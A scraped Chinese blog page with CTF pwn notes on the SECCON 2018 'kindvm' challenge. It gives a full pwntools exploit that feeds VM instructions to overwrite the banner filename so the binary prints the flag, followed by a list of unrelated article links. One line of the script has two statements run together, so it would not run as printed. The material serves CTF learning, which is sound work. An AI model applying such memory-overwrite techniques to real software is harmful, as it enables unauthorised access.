当前位置: 首页 > news >正文

[CTF]-Pwn:做题笔记

seccon2018_kindvm解析(vm):

查看保护

这里有两次输入。

完整exp:

from pwn import*
p=process('./kindvm')p.sendlineafter(b'Input your name :',b'flag')
payload=b'\x01\x00\xff\xd8'
payload+=b'\x02\xff\xdc\x00'
payload+=b'\x06'
p.sendlineafter(b'Input instruction :',payload)
p.interactive()

#补充点1:这里所执行的主要操作是把flag字符串传入reg[0],再从reg[0]覆盖banner.txt,程序就会打开并输出flag。

#补充点2:因为mem全被赋值为A,所以动调可以确定偏移量。


http://www.mrgr.cn/news/17811.html

相关文章:

  • Lazada商家必看:如何高效利用自养号进行产品测评
  • 深入理解Go语言中的Interface:灵活而强大的类型系统
  • 行为型设计模式-迭代器(Iterator)模式-python实现
  • 【机器学习入门】一文读懂线性支持向量机SVM
  • Java中的String与StringBuilder详解
  • 5年数据观巨变,这家公司如何在AI和大模型数据赛道遥遥领先?
  • Redis 的内存淘汰策略详解
  • 101.SAP MII功能详解(15)Workbench-Transaction Logic(Iterator)
  • 【路径规划】移动机器人路径规划算法的实现
  • VUE 实现三级权限选中与全选
  • HMI触屏网关-VISION如何与Modbus TCP从机通信
  • 深度干货 | 以NDR为主线,深度解析纷享销客融资背后的经营与价值
  • 前端Flex布局常见的几个问题
  • 中资优配:白马股跌出性价比 基金经理公开唱多
  • 计算机毕业设计选题推荐-办公楼物业管理系统-Java/Python项目实战
  • docker 介绍以及常用命令
  • RTP协议
  • 基于zigbee的广告牌安全监测系统设计与实现(论文+源码)
  • 《黑神话:悟空》:文化与技术的碰撞与数字创作的新方向
  • Nginx安全性配置